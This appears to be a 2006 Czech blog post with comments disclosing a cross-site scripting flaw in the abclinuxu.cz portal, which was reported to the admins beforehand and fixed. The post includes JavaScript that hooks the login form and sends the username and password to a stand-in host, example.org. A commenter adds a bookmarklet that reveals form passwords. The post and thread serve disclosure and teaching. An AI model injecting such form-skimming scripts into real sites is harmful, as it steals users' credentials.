abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 13:11 | Pozvánky

    Chcete vědět, co se odehrálo ve světě techniky za poslední měsíc? Nebo si popovídat o tom, co zrovna bastlíte? Pak dorazte na prosincovou Virtuální Bastlírnu s mikrofonem a kamerou, nalijte si něco k pití a ponořte se s strahovskými bastlíři do diskuze u virtuálního piva o technice i všem možném okolo. O čem budou tentokrát strahováci referovat? Téměř každý už si všiml významného zdražení RAM a SSD, jsou zde ale i příjemnější zprávy. Průša uvádí

    … více »
    bkralik | Komentářů: 0
    dnes 12:55 | Bezpečnostní upozornění

    Národní úřad pro kybernetickou a informační bezpečnost (NÚKIB) podporuje vyjádření partnerů ze Spojeného království, kteří upozorňují na škodlivé aktivity společností Anxun Information Technology (též „I-S00N“) (pdf) a Beijing Integrity Technology (též „Integrity Tech“) působících v kyberprostoru a sídlících v Čínské lidové republice (ČLR). Tyto společnosti jsou součástí komplexního ekosystému soukromých subjektů v ČLR,

    … více »
    Ladislav Hagara | Komentářů: 2
    dnes 04:55 | IT novinky

    Společnost Pebble představila (YouTube) prsten s tlačítkem a mikrofonem Pebble Index 01 pro rychlé nahrávání hlasových poznámek. Prsten lze předobjednat za 75 dolarů.

    Ladislav Hagara | Komentářů: 3
    dnes 04:22 | IT novinky

    Společnost JetBrains v listopadu 2021 představila nové IDE s názvem Fleet. Tento týden oznámila jeho konec. Od 22. prosince 2025 již nebude možné Fleet stáhnout.

    Ladislav Hagara | Komentářů: 1
    včera 21:22 | Nová verze

    Byl vydán Mozilla Firefox 146.0. Přehled novinek v poznámkách k vydání a poznámkách k vydání pro vývojáře. Řešeny jsou rovněž bezpečnostní chyby. Nový Firefox 146 bude brzy k dispozici také na Flathubu a Snapcraftu.

    Ladislav Hagara | Komentářů: 0
    včera 17:00 | IT novinky

    Před rokem převzala Digitální a informační agentura (DIA) vlastnictví a provoz jednotné státní domény gov.cz. Nyní spustila samoobslužný portál, který umožňuje orgánům veřejné moci snadno registrovat nové domény státní správy pod doménu gov.cz nebo spravovat ty stávající. Proces nové registrace, který dříve trval 30 dní, se nyní zkrátil na několik minut.

    Ladislav Hagara | Komentářů: 7
    včera 11:33 | IT novinky

    IBM kupuje za 11 miliard USD (229,1 miliardy Kč) firmu Confluent zabývající se datovou infrastrukturou. Posílí tak svoji nabídku cloudových služeb a využije růstu poptávky po těchto službách, který je poháněný umělou inteligencí.

    Ladislav Hagara | Komentářů: 0
    včera 01:55 | IT novinky

    Nejvyšší správní soud (NSS) podruhé zrušil pokutu za únik zákaznických údajů z e-shopu Mall.cz. Incidentem se musí znovu zabývat Úřad pro ochranu osobních údajů (ÚOOÚ). Samotný únik ještě neznamená, že správce dat porušil svou povinnost zajistit jejich bezpečnost, plyne z rozsudku dočasně zpřístupněného na úřední desce. Úřad musí vždy posoudit, zda byla přijatá opatření přiměřená povaze rizik, stavu techniky a nákladům.

    Ladislav Hagara | Komentářů: 11
    8.12. 18:44 | Komunita

    Organizace Free Software Foundation Europe (FSFE) zrušila svůj účet na 𝕏 (Twitter) s odůvodněním: "To, co mělo být původně místem pro dialog a výměnu informací, se proměnilo v centralizovanou arénu nepřátelství, dezinformací a ziskem motivovaného řízení, což je daleko od ideálů svobody, za nimiž stojíme". FSFE je aktivní na Mastodonu.

    Ladislav Hagara | Komentářů: 33
    8.12. 17:55 | IT novinky

    Paramount nabízí za celý Warner Bros. Discovery 30 USD na akcii, tj. celkově o 18 miliard USD více než nabízí Netflix. V hotovosti.

    Ladislav Hagara | Komentářů: 3
    Jaké řešení používáte k vývoji / práci?
     (34%)
     (48%)
     (19%)
     (17%)
     (22%)
     (15%)
     (24%)
     (16%)
     (18%)
    Celkem 450 hlasů
     Komentářů: 18, poslední 2.12. 18:34
    Rozcestník

    Jak ukrást hesla uživatelům abclinuxu?

    2.5.2006 21:59 | Přečteno: 2536× | Různé | poslední úprava: 3.5.2006 08:54

    Když tak řeším bezpečností chyby v phpMyAdminovi, napadlo mě jak jsou proti podobným věcem zabezpečené portály. Protože dost často používám abclinuxu, tak přišlo první na mušku :-).

    Předem podotýkám, že tento článek byl nejdříve dán k dispozici adminům, takže doufám, že v době zveřejnění už není možné toto provést.

    Většina prohlížečů dnes umí javascript, který se dá dělat spousta zajímavých věcí. Třeba přidat javascript na obsluhu nějaké událost nebo posílat XML HTTP requesty. Bystřejším již možná dochází, že pokud si můžu vložit vlastní javascript, není žádný problém odchytit odesílání přihlašovacího formuláře. Kdo nevěří, může si zkusit následující ukázku (ta heslo jenom zobrazí, ale to už je jenom detail):

    <script type="text/javascript">
    <!--
    function process() {
        p = document.getElementById('pwd').value;
        u = document.getElementById('usr').value;
        document.getElementById('ls_prepinac').innerHTML = 
            '<img src="http://example.org/?u=' + 
            u + '&p=' + p + '"/>';
        window.alert('odeslano na example.org:\npass: ' + 
            p + '\n' + 'user: ' + u);
    }
    function load() {
        frm = document.forms[0];
        frm.onsubmit = process;
    }
    window.onload = load;
    //-->
    </script>
    
    <div id="ls_prepinac">xx</div>
    <form method="post">
    <input type="text" name="u" id="usr">
    <input type="password" name="p" id="pwd">
    <input type="submit">
    </form>
    

    Teď už jenom zbývá jak dostat vlastní javascript na logovací stránku. Protože je samostatná, tak jediná věc, která je tam vidět z uživatelem ovlivnitelného obsahu jsou zprávičky. Obsah zpráviček je (aspoň v to doufám) kontrolován na dovolené html, ale ještě nám zbývá jeden zajímavý prvek. Tím je naše jméno, tam si můžeme napsat cokoliv co chceme, včetně javascriptu. Tak teď už jen zbývá doufat, že to moc lidí nezrealizovalo :-). Napsat zprávičku, která bude schválena až takový problém není a pak už je dílo dokonáno.

    Jaké je řešení? Nedovolovat nikde javascript, dá se použít k mnoha nebezpečným věcem.

    Stav chyby:

           

    Hodnocení: 99 %

            špatnédobré        

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Vložit další komentář

    wake avatar 2.5.2006 22:20 wake | skóre: 30 | blog: wake | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    pane, vy jste hacker !
    Tento příspěvek má hlavičku i patičku!
    hajma avatar 2.5.2006 22:34 hajma | skóre: 27 | blog: hajma | Říčany
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Ač momentálně na jiném PC, přemohl jsem lenost a přihlásil jsem se, abych ti mohl dát 3 body.
    21 promarněných znaků
    David Watzke avatar 3.5.2006 05:26 David Watzke | skóre: 74 | blog: Blog... | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Jak by řekl Kryton: "Já musím jít prát spodky!"
    “Being honest may not get you a lot of friends but it’ll always get you the right ones” ―John Lennon
    3.5.2006 07:56 rastos | skóre: 63 | blog: rastos
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Ja teda neviem o javascripte skoro nič. Ale mohol by autor detailnejšie vysvetliť, ako to funguje (resp. malo fungovať)?

    Pretože mne to pripadá tak, že pri zobrazení správičky sa vyrobia dva fieldy na stránke vyzývajúce na zadanie mena a hesla a button na odoslanie. A pri odoslaní sa obsah tých polí zobrazí v message-boxe. Nie je mi jasné, prečo by som do tých polí ja vypisoval svoj password a ako by sa k tomu passwordu dostal niekto iný, ako ten kto ho tam vypísal?
    .. avatar 3.5.2006 08:53 .. | skóre: 4 | blog:
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Podstatny je ten javascript. HTML kod formulare je jenom pro ukazku, at si to muze kazdy odzkouset sam, doma/v prace/whatever
    3.5.2006 08:56 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Asi nebylo korektí v té ukázce dát dohromady HTML formuláře a ten javascript, tak teď to je pěkně zvlášť :-).
    3.5.2006 08:57 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    xvasek avatar 3.5.2006 10:10 xvasek | skóre: 21 | blog: | Zlín
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Teď už to chápeme i my pomalejší, díky. :-)

    Hmm, tak jsem chtěl přihodit veselou historku z natáčení a ukázat fintu, jak jsme to dělali za starých časů my a našel jsem jinou (ne až tak velkou) zranitelnost ábíčka. :-) Kam to oznámit? (Resp. teda jaký má Leoš jabber nebo mail? Nebo do bugzilly?)
    3.5.2006 10:53 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Mail mu můžeš poslat třeba z profilu. Ten bude mít radost :-).
    xvasek avatar 3.5.2006 11:49 xvasek | skóre: 21 | blog: | Zlín
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Tímto se omlouvám za svou slepost, v jeho profilu jsem byl a talačítko "Pošlete mi email" jsem nějak nezvládnul lokalizovat a použít. Ale všechno dobře dopadlo, Leoš talčítko v mém profilu zřejmě použít dokázal. :-) Zatím mi poslal smajlíka, takže radost zřejmě má. :-)
    3.5.2006 12:45 Leoš Literák | skóre: 74 | blog: LL | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Dle popisu ten problem neohrozuje uzivatele, jen muze zpusobit necitelnost diskusi. Mel bych se konecne dokopat k te automaticke konverzi spicatych zavorek na HTML entity a bude pokoj ;-) Jenze to bych musel prestat pouzivat jednu knihovnu na parsovani HTML, takze moc prace.
    Zakladatel tohoto portálu. Twitter, LinkedIn, blog, StackOverflow
    3.5.2006 08:55 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Ten formulář zůstane původní pro přihlášení, jediné co je navíc je ten javascript. Někdo jiný se k tomu dostane tak, že třeba vložíme obrázek. Přepsal jsem ukázku, takže by to mohlo být jasnější (ve skutečnosti by byl javascript asi v samostatném souboru a vložil by se jen odkaz na něj.
    3.5.2006 09:56 digri | skóre: 12 | blog: digri
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    3.5.2006 11:05 Jiří (BoodOk) Kadeřávek | skóre: 19 | blog: BoodOk | Brno
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Zajimalo by mne jak ta hesla dostanete k sobe?
    Věda má v sobě určitou zpupnost, že čím dokonalejší techniku vyvineme, čím více se dozvíme, tím lepší budou naše životy.
    3.5.2006 11:10 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Z toho požadavku na webserver example.org, který nahradím nějakým vlastním. Bohatě na to stačí nějaký free hosting.
    3.5.2006 11:48 Jiří (BoodOk) Kadeřávek | skóre: 19 | blog: BoodOk | Brno
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Mea culpa, nedbale jsem ten kod cetl. Zmatla mne zminka o XMLHttpRequestu, ten ma ochranu pred cross-site komunikaci. Jinak super postreh.
    Věda má v sobě určitou zpupnost, že čím dokonalejší techniku vyvineme, čím více se dozvíme, tím lepší budou naše životy.
    3.5.2006 11:55 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Ano ten ochranu má, už ani nevím proč jsem ho zmiňoval :-).
    3.5.2006 11:55 rastos | skóre: 63 | blog: rastos
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Ešte to má stále chybičku, že to heslo tam musí byť vyplnené v čase keď sa tá stránka práve nahrá. Takže by to chcelo zavesiť na nejaký iný event.

    Ale keď už sme pri tom ... mám bookmark na lište, čo má miesto URL toto:

    javascript:(function(){var s,F,j,f,i; s = %22%22; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == %22password%22) s += f[i].value + %22\n%22; } } if (s) alert(%22Passwords in forms on this page:\n\n%22 + s); else alert(%22There are no passwords in forms on this page.%22);})();

    Ake je na stránke heslo a ja vidím len hviezdičky, tak ho ukáže v message-boxe. Funguje to v 95% prípadov ;-)
    3.5.2006 12:19 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Nemusí, to se provádí až při odesílání formuláře. Při natažení dokumentu se jenom nastaví event handler na to odesílání.
    3.5.2006 12:51 Leoš Literák | skóre: 74 | blog: LL | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Dekuji Michalovi za tip pro vylepseni abicka. Ochrana tam byla, ale jen u jmen neregistrovanych uzivatelu v diskusi, u profilu chybela.
    Zakladatel tohoto portálu. Twitter, LinkedIn, blog, StackOverflow
    brozkeff avatar 3.5.2006 21:45 brozkeff | skóre: 13 | blog: Zpátky po 10 letech | Žďár nad Sázavou
    Rozbalit Rozbalit vše hehe
    Aneb Byl tu názor, že něco takového by reglí uživatelé nikdy neudělali ;e) ?
    3.5.2006 13:26 Marian2
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Nie prepac, toto by normalne nemalo fungovat. Niesom admin tohto servra a ani neviem nic o zabezpekach tohto servera ale skoro kazdy web si riesi kontrolu tohto problemu, ktory si tu nastitil. Inak toto je super priklad coho by sa mali ludia vyvarovat pri tvoreni webu. Da sa to riesit funkciuo strip_tags() + pomocne scripty viac na http://sk2.php.net/manual/en/function.strip-tags.php (zamerne nedavam, odkaz pretoze neviem ci je dovolene odkazovat z tohto webu na ine weby, admini to nemaju radi:) Tato funkcia sa da samozrejme obist ale to uz je pomaly priestor na novy blog :)
    Kazdy linuxak by si mal uvedomit ze aj windows ma svoje caro a dokaze byt v niecom silnym nastrojom.
    3.5.2006 13:32 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Skoro vždycky se najde pole, kde ta kontrola je zapomenutá, tady to byl jméno uživatele.
    3.5.2006 13:38 Marian2
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Ano samozrejme, ja nekritizujem adminov, cielom blogov a podobnych diskusii je najst riesenie, co v poslednej dobe vela ludi prestava respektovat.
    Kazdy linuxak by si mal uvedomit ze aj windows ma svoje caro a dokaze byt v niecom silnym nastrojom.
    3.5.2006 14:20 happy barney | skóre: 34 | blog: dont_worry_be_happy
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    a samozrejme, skoro vzdy sa najde web, ktory nie je pisany v php :-)))
    3.5.2006 14:39 Marian2
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    a samozrejme vsetko sa da prehnat vsetkym ak sa chce :-)
    Kazdy linuxak by si mal uvedomit ze aj windows ma svoje caro a dokaze byt v niecom silnym nastrojom.
    3.5.2006 19:58 Mazarik
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    A koli takymto vtipalkom pouzivam firefoxie rozsirenie NoScript:)
    3.5.2006 20:07 Michal Čihař | skóre: 61 | blog: Bláboly | Praha
    Rozbalit Rozbalit vše Re: Jak ukrást hesla uživatelům abclinuxu?
    Já taky :-). Ale pokud máš javascript povolený pro abclinuxu.cz a někomu se to podaří vložit přímo do stránky, tak to ničemu nezabrání.

    Založit nové vláknoNahoru

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.